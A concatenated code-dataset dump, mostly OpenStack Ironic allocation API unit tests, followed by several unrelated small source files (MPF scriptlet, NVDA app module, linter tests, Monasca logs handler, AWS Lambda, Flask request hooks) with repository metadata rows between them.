self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_with_traits(self):
adict = apiutils.allocation_post_data()
adict['traits'] = ['CUSTOM_GPU', 'CUSTOM_FOO_BAR']
response = self.post_json('/allocations', adict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(['CUSTOM_GPU', 'CUSTOM_FOO_BAR'],
response.json['traits'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(['CUSTOM_GPU', 'CUSTOM_FOO_BAR'],
result['traits'])
def test_create_allocation_invalid_trait(self):
adict = apiutils.allocation_post_data()
adict['traits'] = ['CUSTOM_GPU', 'FOO_BAR']
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_invalid_candidate_node_format(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['invalid-format'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_candidate_node_not_found(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['1a1a1a1a-2b2b-3c3c-4d4d-5e5e5e5e5e5e'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_candidate_node_invalid(self):
adict = apiutils.allocation_post_data(
candidate_nodes=['this/is/not a/node/name'])
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_create_allocation_name_ok(self):
name = 'foo'
adict = apiutils.allocation_post_data(name=name)
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(name, result['name'])
def test_create_allocation_name_invalid(self):
name = 'aa:bb_cc'
adict = apiutils.allocation_post_data(name=name)
response = self.post_json('/allocations', adict, headers=self.headers,
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
def test_create_by_node_not_allowed(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data()
response = self.post_json('/nodes/%s/allocation' % node.uuid,
adict, headers=self.headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_create_node_uuid_not_allowed(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data()
adict['node_uuid'] = node.uuid
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_owner(self):
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(owner, result['owner'])
def test_create_allocation_owner_not_allowed(self):
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
response = self.post_json('/allocations', adict,
headers={api_base.Version.string: '1.59'},
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
def test_backfill(self):
node = obj_utils.create_test_node(self.context)
adict = apiutils.allocation_post_data(node=node.uuid)
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertNotIn('node', result)
def test_backfill_with_name(self):
node = obj_utils.create_test_node(self.context, name='backfill-me')
adict = apiutils.allocation_post_data(node=node.name)
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertNotIn('node', result)
def test_backfill_without_resource_class(self):
node = obj_utils.create_test_node(self.context,
resource_class='bm-super')
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertEqual(node.uuid, result['node_uuid'])
self.assertEqual('bm-super', result['resource_class'])
def test_backfill_copy_instance_uuid(self):
uuid = uuidutils.generate_uuid()
node = obj_utils.create_test_node(self.context,
instance_uuid=uuid,
resource_class='bm-super')
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertEqual(uuid, result['uuid'])
self.assertEqual(node.uuid, result['node_uuid'])
self.assertEqual('bm-super', result['resource_class'])
def test_backfill_node_not_found(self):
adict = apiutils.allocation_post_data(node=uuidutils.generate_uuid())
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_backfill_not_allowed(self):
node = obj_utils.create_test_node(self.context)
headers = {api_base.Version.string: '1.57'}
adict = {'node': node.uuid}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(owner, response.json['owner'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(owner, result['owner'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_older_version(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
del adict['owner']
headers = {api_base.Version.string: '1.59', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_forbidden(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
raise exception.HTTPForbidden(resource='fake')
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data()
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_with_owner(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
adict['owner'] = owner
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(owner, response.json['owner'])
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual(owner, result['owner'])
@mock.patch.object(policy, 'authorize', autospec=True)
def test_create_restricted_allocation_with_mismatch_owner(
self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:create':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
owner = '12345'
adict = apiutils.allocation_post_data(owner=owner)
adict['owner'] = '54321'
headers = {api_base.Version.string: '1.60', 'X-Project-Id': owner}
response = self.post_json('/allocations', adict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(rpcapi.ConductorAPI, 'destroy_allocation')
class TestDelete(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestDelete, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.allocation = obj_utils.create_test_allocation(
self.context, node_id=self.node.id, name='alloc1')
self.mock_get_topic = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_random_topic')
).mock
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_by_id(self, mock_notify, mock_destroy):
self.delete('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid),
])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_node_locked(self, mock_notify, mock_destroy):
self.node.reserve(self.context, 'fake', self.node.uuid)
mock_destroy.side_effect = exception.NodeLocked(node='fake-node',
host='fake-host')
ret = self.delete('/allocations/%s' % self.allocation.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.CONFLICT, ret.status_code)
self.assertTrue(ret.json['error_message'])
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid),
])
def test_delete_allocation_invalid_api_version(self, mock_destroy):
response = self.delete('/allocations/%s' % self.allocation.uuid,
expect_errors=True,
headers={api_base.Version.string: '1.14'})
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_delete_allocation_invalid_api_version_without_check(self,
mock_destroy):
# Invalid name, but the check happens after the microversion check.
response = self.delete('/allocations/ba!na!na1',
expect_errors=True,
headers={api_base.Version.string: '1.14'})
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_delete_allocation_by_name(self, mock_destroy):
self.delete('/allocations/%s' % self.allocation.name,
headers=self.headers)
self.assertTrue(mock_destroy.called)
def test_delete_allocation_by_name_with_json(self, mock_destroy):
self.delete('/allocations/%s.json' % self.allocation.name,
headers=self.headers)
self.assertTrue(mock_destroy.called)
def test_delete_allocation_by_name_not_existed(self, mock_destroy):
res = self.delete('/allocations/%s' % 'blah', expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_allocation_by_node(self, mock_notify, mock_destroy):
self.delete('/nodes/%s/allocation' % self.node.uuid,
headers=self.headers)
self.assertTrue(mock_destroy.called)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid),
])
def test_delete_allocation_by_node_not_existed(self, mock_destroy):
node = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
res = self.delete('/nodes/%s/allocation' % node.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_delete_allocation_invalid_node(self, mock_destroy):
res = self.delete('/nodes/%s/allocation' % uuidutils.generate_uuid(),
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_delete_allocation_by_node_invalid_api_version(self, mock_destroy):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.delete(
'/nodes/%s/allocation' % self.node.uuid,
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertFalse(mock_destroy.called)
| 48.79798
| 79
| 0.60357
|
745727e1a86b6e0796582eda1945544ceaf05a40
| 1,101
|
py
|
Python
|
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
mpf/core/scriptlet.py
|
pmansukhani/mpf
|
0979965d24bcaba9423b43581c6a18b847b1b900
|
[
"MIT"
] | null | null | null |
"""Contains the parent class for DEPRECATED Scriptlets.
This is deprecated and will be removed in config_version 6 with MPF 0.60.
Use custom code instead.
"""
from mpf.core.delays import DelayManager
from mpf.core.logging import LogMixin
class Scriptlet(LogMixin):
"""Baseclass for DEPRECATED scriptlets which are simple scripts in a machine.
This is deprecated and will be removed in config_version 6 with MPF 0.60.
Use custom code instead.
"""
def __init__(self, machine, name):
"""Initialise scriptlet."""
super().__init__()
self.machine = machine
self.name = name
self.configure_logging('Scriptlet.' + name, 'basic', 'full')
self.delay = DelayManager(self.machine)
self.on_load()
def __repr__(self):
"""Return string representation."""
return '<Scriptlet.{}>'.format(self.name)
def on_load(self):
"""Automatically called when this Scriptlet loads.
        Scriptlet writers are expected to override this method in their
        Scriptlet subclass.
"""
pass
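# A minimal sketch of the (deprecated) intended usage, assuming LogMixin's
# info_log helper; `MyScriptlet` and the log message are illustrative:
#
#     class MyScriptlet(Scriptlet):
#         def on_load(self):
#             self.info_log('%s loaded', self.name)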
| 28.230769
| 81
| 0.66485
|
a61dfd0922fa697af679445ee2b86d173e490ae8
| 355
|
py
|
Python
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 19
|
2016-05-11T05:15:31.000Z
|
2022-03-17T12:40:10.000Z
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 307
|
2015-08-27T11:22:33.000Z
|
2022-03-29T10:43:34.000Z
|
source/appModules/winal.py
|
riku22/nvdajp
|
66a828ea89d317e4aa0ad2aed4b3b1e08920afb6
|
[
"bzip2-1.0.6"
] | 14
|
2016-03-28T07:31:49.000Z
|
2022-03-30T04:56:35.000Z
|
#appModules/ALTAIR for Windows.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012 Tomohiro Saito
"""App module for ALTAIR for Windows
"""
import appModuleHandler
class AppModule(appModuleHandler.AppModule):
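	# sleepMode makes NVDA stay silent (no speech or braille) while this
	# self-voicing application has focus.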
	sleepMode = True
| 22.1875
| 57
| 0.749296
|
0cbd6abf0d8addc9af6d9e2cf2c461408ba97f41
| 1,173
|
py
|
Python
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 1,931
|
2018-03-17T13:52:45.000Z
|
2022-03-27T09:39:17.000Z
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 2,231
|
2018-03-09T21:19:05.000Z
|
2022-03-31T08:35:37.000Z
|
tests/test_visitors/test_ast/test_subscripts/test_float_key_usage.py
|
cdhiraj40/wemake-python-styleguide
|
7cef9be081d594c30045b7a98cae77a9be46e1aa
|
[
"MIT"
] | 492
|
2018-05-18T21:20:28.000Z
|
2022-03-20T14:11:50.000Z
|
import pytest
from wemake_python_styleguide.violations.best_practices import FloatKeyViolation
from wemake_python_styleguide.visitors.ast.subscripts import CorrectKeyVisitor
usage_template = 'some_dict[{0}]'
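# Float keys are targeted because binary floats compare imprecisely, which
# makes them unreliable as dict keys.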
@pytest.mark.parametrize('expression', [
'1.0',
'-0.0',
'+3.5',
])
def test_float_key_usage(
assert_errors,
parse_ast_tree,
expression,
default_options,
):
"""Testing that redundant subscripts are forbidden."""
tree = parse_ast_tree(usage_template.format(expression))
visitor = CorrectKeyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [FloatKeyViolation])
@pytest.mark.parametrize('expression', [
'5',
'name',
'call()',
'name.attr',
'name[sub]',
'...',
'"str"',
'b""',
'3j',
'5 + 0.1',
'3 / 2',
])
def test_correct_subscripts(
assert_errors,
parse_ast_tree,
expression,
default_options,
):
"""Testing that non-redundant subscripts are allowed."""
tree = parse_ast_tree(usage_template.format(expression))
visitor = CorrectKeyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
| 21.327273
| 80
| 0.674339
|
539a7b7682427f2f809c69b0cf1dc92133633778
| 3,030
|
py
|
Python
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 50
|
2015-10-18T02:54:52.000Z
|
2021-12-05T07:54:08.000Z
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 13
|
2015-10-29T12:54:07.000Z
|
2021-09-02T06:17:42.000Z
|
monasca_api/v2/reference/logs.py
|
MheniMerz/monasca-api
|
9c0892a58622082ed8baf81ee2f621cc68f5b42c
|
[
"Apache-2.0"
] | 81
|
2015-10-21T07:43:30.000Z
|
2022-01-07T03:35:05.000Z
|
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
# Copyright 2016-2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import falcon
from oslo_log import log
from monasca_api.api.core.log import exceptions
from monasca_api.api.core.log import validation
from monasca_api.api import logs_api
from monasca_api import conf
from monasca_api.v2.common import bulk_processor
from monasca_api.v2.reference import helpers
CONF = conf.CONF
LOG = log.getLogger(__name__)
class Logs(logs_api.LogsApi):
VERSION = 'v2.0'
SUPPORTED_CONTENT_TYPES = {'application/json'}
def __init__(self):
super(Logs, self).__init__()
self._processor = bulk_processor.BulkProcessor()
def on_post(self, req, res):
helpers.validate_json_content_type(req)
helpers.validate_authorization(req, ['api:logs:post'])
helpers.validate_payload_size(req.content_length)
self.process_on_post_request(req, res)
def process_on_post_request(self, req, res):
try:
request_body = helpers.from_json(req)
log_list = self._get_logs(request_body)
global_dimensions = self._get_global_dimensions(request_body)
except Exception as ex:
LOG.error('Entire bulk package has been rejected')
LOG.exception(ex)
raise ex
tenant_id = (req.cross_project_id if req.cross_project_id
else req.project_id)
try:
self._processor.send_message(
logs=log_list,
global_dimensions=global_dimensions,
log_tenant_id=tenant_id
)
except Exception as ex:
res.status = getattr(ex, 'status', falcon.HTTP_500)
return
res.status = falcon.HTTP_204
@staticmethod
def _get_global_dimensions(request_body):
"""Get the top level dimensions in the HTTP request body."""
global_dims = request_body.get('dimensions', {})
validation.validate_dimensions(global_dims)
return global_dims
@staticmethod
def _get_logs(request_body):
"""Get the logs in the HTTP request body."""
if request_body is None:
            raise falcon.HTTPBadRequest('Bad request',
                                        'Request body is empty')
if 'logs' not in request_body:
raise exceptions.HTTPUnprocessableEntity(
'Unprocessable Entity Logs not found')
return request_body['logs']
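# A sketch of the bulk payload this handler accepts, based on the field names
# read above ('dimensions' and 'logs'); the concrete values are illustrative:
#
#     {
#         "dimensions": {"hostname": "web-01"},
#         "logs": [
#             {"message": "disk is almost full", "dimensions": {"service": "mysql"}}
#         ]
#     }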
| 33.666667
| 75
| 0.674917
|
291e51bdd3d991b1f8addfff5dac0dfa840480f5
| 223
|
py
|
Python
|
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
Python/UberX.py
|
Gera-Garza/POO_practica
|
480af9ec9e5edbc33f1b18083a1bd85aff8d7c64
|
[
"Artistic-1.0-cl8"
] | null | null | null |
from car import Car
class UberX(Car):
    brand: str
    model: str
    def __init__(self, license, driver, brand, model):
super().__init__(license, driver)
self.brand = brand
self.model = model
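# Hedged usage sketch; Car's (license, driver) constructor signature is
# inferred from the super().__init__ call above, and the values are made up:
#
#     ride = UberX('ABC-123', 'Gera', 'Toyota', 'Corolla')
#     print(ride.brand, ride.model)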
| 22.3
| 55
| 0.61435
|
888458e3eb8df61d32dcd71b7bb4d76e91ed3215
| 1,862
|
py
|
Python
|
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | 4
|
2021-07-27T13:37:20.000Z
|
2021-09-15T16:49:15.000Z
|
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | null | null | null |
Amazon_Connect-Agent_Status/Agent_Status-Cloud_App/lambda_stream/index.py
|
aws-iot-edukit/Other_Examples-Core2_for_AWS
|
c224148feb7398a2e0b3486cba4ff24fa4f4db40
|
[
"MIT-0",
"MIT"
] | 2
|
2021-07-27T13:51:08.000Z
|
2021-09-12T19:57:47.000Z
|
import json
import boto3
import base64
import os
TABLE_NAME = os.environ['TABLE_NAME']
dynamodb_client = boto3.client('dynamodb')
iotdata_client = boto3.client('iot-data', region_name='eu-west-1')
def get_record(AgentARN):
try:
response = dynamodb_client.query(
TableName=TABLE_NAME,
KeyConditionExpression='AgentARN = :AgentARN',
ExpressionAttributeValues={':AgentARN': {'S': AgentARN } }
)
    except Exception:
return 1,'dynamodb_client'
return 0,response
def publish_shadow(device,record):
if record['CurrentAgentSnapshot']['AgentStatus']['Name'] == "Available":
record['CurrentAgentSnapshot']['AgentStatus']['Name'] = 'AVAILABLE'
elif record['CurrentAgentSnapshot']['AgentStatus']['Name'] == "Offline":
record['CurrentAgentSnapshot']['AgentStatus']['Name'] = 'OFFLINE00'
try:
response = iotdata_client.update_thing_shadow(
thingName=device,
payload = json.dumps({
'state': { 'desired': record['CurrentAgentSnapshot']['AgentStatus'] }
})
)
    except Exception:
return 1,'publish_shadow'
return 0,response
def lambda_handler(event, context):
#print(json.dumps(event))
for record in event['Records']:
record = json.loads(base64.b64decode(record['kinesis']['data']).decode('ascii'))
error,response = get_record(record['AgentARN'])
if error > 0:
return { 'status' : 'ERROR:'+response }
error,response = publish_shadow(response['Items'][0]['client_id']['S'],record)
if error > 0:
return { 'status' : 'ERROR:'+response }
#print(response['Items'][0]['client_id']['S'])
print(record['CurrentAgentSnapshot']['AgentStatus']['Name'])
return { 'status' : 'ok' }
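# A sketch of the Kinesis event lambda_handler expects: each record carries a
# base64-encoded JSON document with at least AgentARN and CurrentAgentSnapshot
# (the ARN below is illustrative):
#
#     {
#         "Records": [{
#             "kinesis": {
#                 "data": "<base64 of {\"AgentARN\": \"arn:aws:connect:...\",
#                           \"CurrentAgentSnapshot\": {\"AgentStatus\": {\"Name\": \"Available\"}}}>"
#             }
#         }]
#     }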
| 30.032258
| 88
| 0.604189
|
791b79d537ebf6c13c91a18c29865ae8b286bc8e
| 4,075
|
py
|
Python
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 1
|
2020-06-21T04:08:26.000Z
|
2020-06-21T04:08:26.000Z
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 13
|
2019-10-18T17:19:32.000Z
|
2022-01-13T00:44:43.000Z
|
api_restful/urls.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 5
|
2019-02-07T03:15:16.000Z
|
2021-09-04T14:06:28.000Z
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: urls.py
@time: 2020-02-28 21:21
"""
from __future__ import unicode_literals
from uuid import uuid4
import logging
import time
from collections import defaultdict
from flask import jsonify, request, g, make_response
from werkzeug.exceptions import NotFound, InternalServerError
from api_restful.signals.operation_log import signal_operation_log
from api_restful import app
# api_logger = logging.getLogger('api')
debug_logger = logging.getLogger('debug')
SUCCESS_MSG = app.config['API_SUCCESS_MSG']
FAILURE_MSG = app.config['API_FAILURE_MSG']
@app.before_request
def api_before_request():
    request_id = request.headers.get('X-Request-Id', str(uuid4()))  # for the no-dash form, use uuid4().hex
g.request_id = request_id
debug_logger.debug('before_request')
g.req_time = time.time()
@app.after_request
def after_request(response):
request_id = g.get('request_id', str(uuid4()))
g.request_id = request_id
debug_logger.debug('after_request')
    # inject the request id into the response headers
response.headers.add('X-Request-Id', request_id)
g.status_code = response.status_code
g.project = app.name
g.res_time = time.time()
latency = time.time() - g.req_time
g.latency = latency
# api_log = defaultdict(lambda: '-')
# api_logger.info('-')
    # Operation log
operation_log = {
'project': app.name,
'latency': latency,
'client_host': request.host,
'client_addr': request.remote_addr,
'req_id': request_id,
'req_method': request.method,
'req_path': request.path,
'req_json': request.json,
'req_args': request.args.to_dict(),
'res_status_code': response.status_code,
'res_json': {},
}
    # For GET-type requests, record the response body only on errors; skip
    # successful responses to avoid bloating the log
    if request.method in ['GET', 'HEAD', 'OPTIONS'] and response.status_code != 200:
operation_log['res_json'] = response.json
if request.method in ['POST', 'PUT', 'DELETE']:
operation_log['res_json'] = response.json
signal_operation_log.send(app, **operation_log)
    return response  # the response must be returned
# @app.after_request
# def after_request(response):
# request_id = g.get('request_id', str(uuid4()))
# g.request_id = request_id
# debug_logger.debug('after_request')
#
# g.status_code = response.status_code
#
# # Inject the request id into the response headers
# response.headers.add('X-Request-Id', request_id)
#
# return response  # the response must be returned
# @app.teardown_request
# def teardown_request(exception=None):
# request_id = g.get('request_id', str(uuid4()))
# g.request_id = request_id
# debug_logger.debug('teardown_request')
#
# g.project = app.name
# g.res_time = time.time()
# g.latency = g.res_time - g.req_time
#
# # API log
# g.api_log = defaultdict(lambda: '-')
# g.api_log['project_name'] = app.name
#
# if exception:
# exception_info = {
# 'module': exception.__class__.__module__,
# 'name': exception.__class__.__name__,
# 'message': exception.message,
# }
# g.api_log['exception'] = '%(module)s.%(name)s: %(message)s' % exception_info
# api_logger.error(dict(g.api_log))
# else:
# api_logger.info(dict(g.api_log))
# return exception
@app.route('/', methods=['GET', 'POST', 'OPTIONS'])
def heartbeat():
return jsonify(SUCCESS_MSG.copy())
# Global route-not-found error
@app.errorhandler(NotFound.code)
def url_not_found(error):
return make_response(
jsonify(
{
                'msg': 'Path not found',
'result': False,
# 'status': exceptions.NotFound.code,
}
),
NotFound.code
)
# Global exception handler (effective in DEBUG mode)
@app.errorhandler(Exception)
def exception(error):
return make_response(
jsonify(
{
                'msg': str(error) or InternalServerError.description,
'result': False,
# 'status': InternalServerError.code,
}
),
InternalServerError.code
)
| 26.809211
| 93
| 0.635092
|
12102831af8891cb28bfbe6f3c07bef6a4dc80b3
| 2,445
|
py
|
Python
|
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
"MIT"
] | 1
|
2016-11-02T22:35:11.000Z
|
2016-11-02T22:35:11.000Z
|
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
"MIT"
] | null | null | null |
projectenv/scriptgen.py
|
teaminsight-legacy/projectenv
|
873de28986dd4816e4872462b6280a1aed6d2922
|
[
